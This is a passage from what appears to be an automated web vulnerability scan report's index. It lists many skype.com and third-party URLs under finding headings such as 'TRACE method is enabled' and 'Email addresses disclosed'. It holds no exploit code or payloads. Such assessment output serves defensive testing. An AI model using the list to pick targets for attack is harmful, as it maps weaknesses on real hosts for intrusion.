18.559. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles

18.560. http://www.skype.com/intl/en-us/features/allfeatures/call-phones-and-mobiles/

18.561. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer

18.562. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer/

18.563. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification

18.564. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification/

18.565. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls

18.566. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls/

18.567. http://www.skype.com/intl/en-us/features/allfeatures/facebook

18.568. http://www.skype.com/intl/en-us/features/allfeatures/facebook/

18.569. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls

18.570. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls/

18.571. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging

18.572. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging/

18.573. http://www.skype.com/intl/en-us/features/allfeatures/online-number

18.574. http://www.skype.com/intl/en-us/features/allfeatures/online-number/

18.575. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing

18.576. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing/

18.577. http://www.skype.com/intl/en-us/features/allfeatures/send-files

18.578. http://www.skype.com/intl/en-us/features/allfeatures/send-files/

18.579. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number

18.580. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number/

18.581. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls

18.582. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls/

18.583. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi

18.584. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/

18.585. http://www.skype.com/intl/en-us/features/allfeatures/sms

18.586. http://www.skype.com/intl/en-us/features/allfeatures/sms/

18.587. http://www.skype.com/intl/en-us/features/allfeatures/video-call

18.588. http://www.skype.com/intl/en-us/features/allfeatures/video-call/

18.589. http://www.skype.com/intl/en-us/features/allfeatures/voicemail

18.590. http://www.skype.com/intl/en-us/features/allfeatures/voicemail/

18.591. http://www.skype.com/intl/en-us/get-skype

18.592. http://www.skype.com/intl/en-us/get-skype/

18.593. http://www.skype.com/intl/en-us/get-skype/home-phone

18.594. http://www.skype.com/intl/en-us/get-skype/home-phone/

18.595. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone

18.596. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone/

18.597. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter

18.598. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter/

18.599. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call

18.600. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call/

18.601. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux

18.602. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux/

18.603. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx

18.604. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx/

18.605. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows

18.606. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows/

18.607. http://www.skype.com/intl/en-us/get-skype/on-your-mobile

18.608. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/

18.609. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/builtin/nokia-n900

18.610. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype

18.611. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype/

18.612. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype

18.613. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype/

18.614. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android

18.615. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android/

18.616. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian

18.617. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian/

18.618. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile

18.619. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile/

18.620. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-on-3/

18.621. http://www.skype.com/intl/en-us/get-skype/on-your-tv

18.622. http://www.skype.com/intl/en-us/get-skype/on-your-tv/

18.623. http://www.skype.com/intl/en-us/get-skype/other-downloads/

18.624. http://www.skype.com/intl/en-us/legal/terms/fair_usage

18.625. http://www.skype.com/intl/en-us/legal/terms/fair_usage/

18.626. http://www.skype.com/intl/en-us/legal/terms/gvc-fair-usage/

18.627. http://www.skype.com/intl/en-us/prices

18.628. http://www.skype.com/intl/en-us/prices/

18.629. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-afghanistan

18.630. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-albania

18.631. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-algeria

18.632. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-american-samoa

18.633. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-andorra

18.634. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-angola

18.635. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-anguilla

18.636. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antarctica

18.637. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antigua-and-barbuda

18.638. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-argentina

18.639. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-armenia

18.640. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-aruba

18.641. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ascension-islands

18.642. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-australia

18.643. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-austria

18.644. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-azerbaijan

18.645. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahamas

18.646. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahrain

18.647. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bangladesh

18.648. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-barbados

18.649. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belarus

18.650. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belgium

18.651. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belize

18.652. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-benin

18.653. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bermuda

18.654. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bhutan

18.655. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bolivia

18.656. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bosnia-and-herzegovina

18.657. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-botswana

18.658. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brazil

18.659. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-indian-ocean-territory

18.660. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-virgin-islands

18.661. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brunei

18.662. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bulgaria

18.663. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burkina-faso

18.664. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burundi

18.665. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cambodia

18.666. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cameroon

18.667. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-canada

18.668. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cape-verde

18.669. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cayman-islands

18.670. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-central-african-republic

18.671. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chad

18.672. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chile

18.673. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china

18.674. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china-hong-kong-s.a.r.

18.675. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-colombia

18.676. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-comoros

18.677. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-congo

18.678. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cook-islands

18.679. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-costa-rica

18.680. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cote-divoire

18.681. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-croatia

18.682. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cuba

18.683. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cyprus

18.684. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-czech-republic

18.685. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-denmark

18.686. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-djibouti

18.687. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominica

18.688. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominican-republic

18.689. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ecuador

18.690. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-egypt

18.691. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-el-salvador

18.692. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-equatorial-guinea

18.693. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-eritrea

18.694. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-estonia

18.695. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ethiopia

18.696. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-falkland-islands-malvinas

18.697. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-faroe-islands

18.698. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-fiji

18.699. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-finland

18.700. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-france

18.701. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-guiana

18.702. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-polynesia

18.703. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gabon

18.704. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gambia

18.705. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-georgia

18.706. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-germany

18.707. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ghana

18.708. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gibraltar

18.709. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greece

18.710. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greenland

18.711. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-grenada

18.712. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guadeloupe

18.713. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guam

18.714. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guatemala

18.715. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea

18.716. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea-bissau

18.717. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guyana

18.718. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-haiti

18.719. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-honduras

18.720. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-hungary

18.721. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iceland

18.722. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-india

18.723. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-indonesia

18.724. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inmarsat

18.725. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inum

18.726. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iran

18.727. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iraq

18.728. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ireland

18.729. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-israel

18.730. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-italy

18.731. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jamaica

18.732. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-japan

18.733. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jordan

18.734. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kazakhstan

18.735. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kenya

18.736. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kiribati

18.737. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kuwait

18.738. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kyrgyzstan

18.739. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-laos

18.740. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-latvia

18.741. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lebanon

18.742. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lesotho

18.743. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liberia

18.744. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-libya

18.745. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liechtenstein

18.746. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lithuania

18.747. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-luxembourg

18.748. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macao

18.749. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macedonia

18.750. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-madagascar

18.751. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malawi

18.752. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malaysia

18.753. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-maldives

18.754. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-mexico

18.755. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-netherlands

18.756. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-new-zealand

18.757. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-north-korea

18.758. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-norway

18.759. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-poland

18.760. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-portugal

18.761. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-puerto-rico

18.762. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-russia

18.763. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-singapore

18.764. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-south-korea

18.765. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-spain

18.766. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-sweden

18.767. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-switzerland

18.768. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-taiwan

18.769. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tanzania

18.770. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-thailand

18.771. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-the-democratic-republic-of-the-congo

18.772. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-timor-leste

18.773. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-togo

18.774. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tokelau

18.775. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tonga

18.776. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-trinidad-and-tobago

18.777. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tunisia

18.778. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkey

18.779. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkmenistan

18.780. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turks-and-caicos-islands

18.781. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tuvalu

18.782. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uganda

18.783. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ukraine

18.784. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-arab-emirates

18.785. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-kingdom

18.786. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-states

18.787. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uruguay

18.788. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-us-virgin-islands

18.789. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uzbekistan

18.790. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vanuatu

18.791. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vatican-city-state-holy-see

18.792. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-venezuela

18.793. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vietnam

18.794. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-wallis-and-futuna

18.795. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-yemen

18.796. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zambia

18.797. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zimbabwe

18.798. http://www.skype.com/intl/en-us/prices/pay-monthly

18.799. http://www.skype.com/intl/en-us/prices/pay-monthly/

18.800. http://www.skype.com/intl/en-us/prices/payg-rates

18.801. http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/

18.802. http://www.skype.com/intl/en-us/prices/payg-rates/

18.803. http://www.skype.com/intl/en-us/prices/payg-rates/connection-fees/

18.804. http://www.skype.com/intl/en-us/prices/premium

18.805. http://www.skype.com/intl/en-us/prices/premium/

18.806. http://www.skype.com/intl/en-us/prices/skype-credit

18.807. http://www.skype.com/intl/en-us/prices/skype-credit/

18.808. http://www.skype.com/intl/en-us/prices/sms-rates

18.809. http://www.skype.com/intl/en-us/prices/sms-rates/

18.810. http://www.skype.com/intl/en-us/prices/ways-to-pay/

18.811. http://www.skype.com/intl/en-us/special-offers

18.812. http://www.skype.com/intl/en-us/special-offers/

18.813. http://www.skype.com/intl/en-us/tell-a-friend/

18.814. http://www.skype.com/intl/en-us/tell-a-friend/preview/

18.815. http://www.skype.com/intl/en-us/tell-a-friend/shared/

18.816. http://www.skype.com/intl/en/business

18.817. http://www.skype.com/intl/en/business-user-guide/pc/

18.818. http://www.skype.com/intl/en/business/

18.819. http://www.skype.com/intl/en/business/download

18.820. http://www.skype.com/intl/en/business/download/

18.821. http://www.skype.com/intl/en/business/group-video

18.822. http://www.skype.com/intl/en/business/group-video/

18.823. http://www.skype.com/intl/en/business/partners/overview

18.824. http://www.skype.com/intl/en/business/skype-connect

18.825. http://www.skype.com/intl/en/business/skype-connect/

18.826. http://www.skype.com/intl/en/business/skype-manager

18.827. http://www.skype.com/intl/en/business/skype-manager/

18.828. http://www.skype.com/intl/en/campaigns/toolbar/

18.829. http://www.skype.com/intl/en/features

18.830. http://www.skype.com/intl/en/features/

18.831. http://www.skype.com/intl/en/features/allfeatures/call-forwarding

18.832. http://www.skype.com/intl/en/features/allfeatures/call-forwarding/

18.833. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles

18.834. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles/

18.835. http://www.skype.com/intl/en/features/allfeatures/call-transfer

18.836. http://www.skype.com/intl/en/features/allfeatures/call-transfer/

18.837. http://www.skype.com/intl/en/features/allfeatures/caller-identification

18.838. http://www.skype.com/intl/en/features/allfeatures/caller-identification/

18.839. http://www.skype.com/intl/en/features/allfeatures/conference-calls

18.840. http://www.skype.com/intl/en/features/allfeatures/conference-calls/

18.841. http://www.skype.com/intl/en/features/allfeatures/facebook

18.842. http://www.skype.com/intl/en/features/allfeatures/facebook/

18.843. http://www.skype.com/intl/en/features/allfeatures/group-video-calls

18.844. http://www.skype.com/intl/en/features/allfeatures/group-video-calls/

18.845. http://www.skype.com/intl/en/features/allfeatures/instant-messaging

18.846. http://www.skype.com/intl/en/features/allfeatures/instant-messaging/

18.847. http://www.skype.com/intl/en/features/allfeatures/online-number

18.848. http://www.skype.com/intl/en/features/allfeatures/online-number/

18.849. http://www.skype.com/intl/en/features/allfeatures/screen-sharing

18.850. http://www.skype.com/intl/en/features/allfeatures/screen-sharing/

18.851. http://www.skype.com/intl/en/features/allfeatures/send-files

18.852. http://www.skype.com/intl/en/features/allfeatures/send-files/

18.853. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number

18.854. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number/

18.855. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls

18.856. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls/

18.857. http://www.skype.com/intl/en/features/allfeatures/skype-wifi

18.858. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/

18.859. http://www.skype.com/intl/en/features/allfeatures/sms

18.860. http://www.skype.com/intl/en/features/allfeatures/sms/

18.861. http://www.skype.com/intl/en/features/allfeatures/video-call

18.862. http://www.skype.com/intl/en/features/allfeatures/video-call/

18.863. http://www.skype.com/intl/en/features/allfeatures/voicemail

18.864. http://www.skype.com/intl/en/features/allfeatures/voicemail/

18.865. http://www.skype.com/intl/en/get-skype

18.866. http://www.skype.com/intl/en/get-skype/

18.867. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call

18.868. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call/

18.869. http://www.skype.com/intl/en/get-skype/on-your-computer/linux

18.870. http://www.skype.com/intl/en/get-skype/on-your-computer/linux/

18.871. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx

18.872. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx/

18.873. http://www.skype.com/intl/en/get-skype/on-your-computer/windows

18.874. http://www.skype.com/intl/en/get-skype/on-your-computer/windows/

18.875. http://www.skype.com/intl/en/get-skype/on-your-mobile

18.876. http://www.skype.com/intl/en/get-skype/on-your-mobile/

18.877. http://www.skype.com/intl/en/get-skype/on-your-mobile/built-in/3-skype-phone

18.878. http://www.skype.com/intl/en/get-skype/on-your-mobile/builtin/nokia-n900

18.879. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype

18.880. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype/

18.881. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype

18.882. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype/

18.883. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android

18.884. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android/

18.885. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian

18.886. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian/

18.887. http://www.skype.com/intl/en/get-skype/on-your-mobile/skype-on-3/

18.888. http://www.skype.com/intl/en/get-skype/on-your-tv

18.889. http://www.skype.com/intl/en/get-skype/on-your-tv/

18.890. http://www.skype.com/intl/en/get-skype/other-downloads/

18.891. http://www.skype.com/intl/en/prices

18.892. http://www.skype.com/intl/en/prices/

18.893. http://www.skype.com/intl/en/prices/pay-monthly

18.894. http://www.skype.com/intl/en/prices/pay-monthly/

18.895. http://www.skype.com/intl/en/prices/payg-rates

18.896. http://www.skype.com/intl/en/prices/payg-rates/

18.897. http://www.skype.com/intl/en/prices/premium

18.898. http://www.skype.com/intl/en/prices/premium/

18.899. http://www.skype.com/intl/en/prices/skype-credit

18.900. http://www.skype.com/intl/en/prices/skype-credit/

18.901. http://www.skype.com/intl/en/prices/sms-rates

18.902. http://www.skype.com/intl/en/prices/sms-rates/

18.903. http://www.skype.com/intl/en/prices/subscriptions/

18.904. http://www.skype.com/intl/en/prices/ways-to-pay/

18.905. http://www.skype.com/intl/en/special-offers

18.906. http://www.skype.com/intl/en/special-offers/

18.907. http://www.skype.com/products

18.908. https://www.trustwave.com/

18.909. https://www.trustwave.com/web-application-firewall/

18.910. http://www.w3schools.com/banners/aspallbannerframe.asp

18.911. http://www.w3schools.com/banners/aspallframe.asp

18.912. http://www.w3schools.com/js/js_ex_dom.asp

18.913. http://www.w3schools.com/jsref/dom_obj_base.asp

18.914. http://www.w3schools.com/jsref/dom_obj_frame.asp

18.915. http://www.w3schools.com/jsref/event_frame_onload.asp

18.916. http://www.w3schools.com/tryitbanner.asp

18.917. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps

19. TRACE method is enabled

19.1. http://142.xg4ken.com/

19.2. http://afe.specificclick.net/

19.3. http://apps.sapha.com/

19.4. http://apr.lijit.com/

19.5. http://blogs.skype.com/

19.6. https://blogs.skype.com/

19.7. http://cache.specificmedia.com/

19.8. http://ce.lijit.com/

19.9. http://dce.sapha.com/

19.10. https://developer.skype.com/

19.11. http://embed.technorati.com/

19.12. http://pixel.33across.com/

19.13. http://rotation.linuxnewmedia.com/

19.14. http://shop.skype.com/

19.15. http://vap1den1.lijit.com/

19.16. http://vap2den1.lijit.com/

19.17. http://vap3den1.lijit.com/

19.18. http://welcome.hp-ww.com/

19.19. http://www.cymphonix.com/

19.20. http://www.lijit.com/

19.21. http://www.typepad.com/

19.22. http://www.xg4ken.com/

20. Email addresses disclosed

20.1. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js

20.2. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js

20.3. http://blogs.skype.com/en/2005/05/

20.4. http://blogs.skype.com/en/2005/06/

20.5. http://blogs.skype.com/en/2005/07/

20.6. http://blogs.skype.com/en/2005/08/

20.7. http://blogs.skype.com/en/2005/09/

20.8. http://blogs.skype.com/en/2005/10/

20.9. http://blogs.skype.com/en/2005/11/

20.10. http://blogs.skype.com/en/2005/12/

20.11. http://blogs.skype.com/en/2006/01/

20.12. http://blogs.skype.com/en/2006/02/

20.13. http://blogs.skype.com/en/2006/03/

20.14. http://blogs.skype.com/en/2006/04/

20.15. http://blogs.skype.com/en/2006/05/

20.16. http://blogs.skype.com/en/2006/06/

20.17. http://blogs.skype.com/en/2006/07/

20.18. http://blogs.skype.com/en/2006/08/

20.19. http://blogs.skype.com/en/2006/09/

20.20. http://blogs.skype.com/en/2006/10/

20.21. http://blogs.skype.com/en/2006/11/

20.22. http://blogs.skype.com/en/2006/12/

20.23. http://blogs.skype.com/en/2007/01/

20.24. http://blogs.skype.com/en/2007/02/

20.25. http://blogs.skype.com/en/2007/03/

20.26. http://blogs.skype.com/en/2007/05/

20.27. http://blogs.skype.com/en/2007/06/

20.28. http://blogs.skype.com/en/2007/07/

20.29. http://blogs.skype.com/en/2007/08/

20.30. http://blogs.skype.com/en/2007/10/

20.31. http://blogs.skype.com/en/2007/11/

20.32. http://blogs.skype.com/en/2008/01/

20.33. http://blogs.skype.com/en/2008/04/

20.34. http://blogs.skype.com/en/2008/06/

20.35. http://blogs.skype.com/en/2008/07/

20.36. http://blogs.skype.com/en/2008/09/

20.37. http://blogs.skype.com/en/2008/10/

20.38. http://blogs.skype.com/en/2009/03/

20.39. http://blogs.skype.com/en/2009/08/

20.40. http://blogs.skype.com/en/2009/10/

20.41. http://blogs.skype.com/en/2009/11/

20.42. http://blogs.skype.com/en/2010/01/

20.43. http://blogs.skype.com/en/2010/02/

20.44. http://blogs.skype.com/en/2010/03/

20.45. http://blogs.skype.com/en/2010/04/

20.46. http://blogs.skype.com/en/2010/07/

20.47. http://blogs.skype.com/en/2010/08/

20.48. http://blogs.skype.com/en/2010/09/

20.49. http://blogs.skype.com/en/2010/10/

20.50. http://blogs.skype.com/en/2010/11/

20.51. http://blogs.skype.com/en/2010/12/

20.52. http://blogs.skype.com/en/2011/05/

20.53. http://blogs.skype.com/en/2011/07/

20.54. http://blogs.skype.com/en/2011/08/

20.55. http://blogs.skype.com/en/corporate/

